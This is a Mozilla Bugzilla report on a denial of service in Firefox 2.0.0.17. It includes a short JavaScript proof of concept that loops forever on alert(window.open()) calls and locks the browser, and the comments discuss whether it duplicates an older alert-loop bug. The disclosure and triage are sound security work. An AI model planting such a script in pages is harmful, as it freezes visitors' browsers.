Open
Bug 460477
Opened 16 years ago
Updated 2 years ago
Mozilla 2.0.17 Denial of Service with Recursive Carriage Return Alert NULL
Categories
(Firefox :: Security, defect)
Tracking
()
NEW
People
(Reporter: adi.zerok, Unassigned)
References
Details
(Whiteboard: [sg:dos])
Attachments
(1 file)
353 bytes,
text/html
|
Details |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17
It has been observed that firefox version 2.0.0.17 is vulnerable to cloent side flaw. When a underline script is called the browser gets in locked state with
alert box pointing to a null object.
<script language="javascript">
while (1)
{
alert(window.open("\r\n");
alert(window.open("\r\n");
alert(window.open("\r\n");
alert(window.open("\r\n");
}
</script>
Reproducible: Always
Steps to Reproduce:
<script language="javascript">
while (1)
{
alert(window.open("\r\n");
alert(window.open("\r\n");
alert(window.open("\r\n");
alert(window.open("\r\n");
}
</script>
Actual Results:
Browser Lockdown State with Alert pointing to Null Object
Expected Results:
Denial of Service
Comment 1•16 years ago
|
||
When I try this I get an endless-alert-loop as in bug 61098 (the window.open() calls are blocked by the popup-blocker). Is that what you're seeing, or are you seeing a harder kind of lock-up?
Updated•16 years ago
|
Whiteboard: [sg:needinfo] dupe of bug 61098?
Reporter | ||
Comment 2•16 years ago
|
||
Thats the one aspect. Even If you remove the while loop the stringent behavior is shown again. Ofcourse the browser gets locked till the process is killed after some time manually.
Reporter | ||
Updated•16 years ago
|
Component: General → Security
Version: unspecified → 2.0 Branch
Reporter | ||
Updated•16 years ago
|
Whiteboard: [sg:needinfo] dupe of bug 61098? →
Updated•16 years ago
|
Whiteboard: → [sg:low dos]
Reporter | ||
Updated•16 years ago
|
Summary: Stringent Behavior : Denial of Service with Recursive Carriage Return Alert NULL → Mozilla 2.0.17 Denial of Service with Recursive Carriage Return Alert NULL
Updated•16 years ago
|
Group: core-security
Status: UNCONFIRMED → NEW
Depends on: alertloops
Ever confirmed: true
Whiteboard: [sg:low dos] → [sg:dos]
Comment 3•15 years ago
|
||
Updated•15 years ago
|
QA Contact: general → firefox
Comment 4•15 years ago
|
||
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4
I tried the test case with Fx 3.6.4 and this issue is still present. :(
Please test it in nightly
http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/
I think this is no longer an issue after Bug 61098 fix...
Updated•2 years ago
|
Severity: normal → S3
You need to log in
before you can comment on or make changes to this bug.
Description
•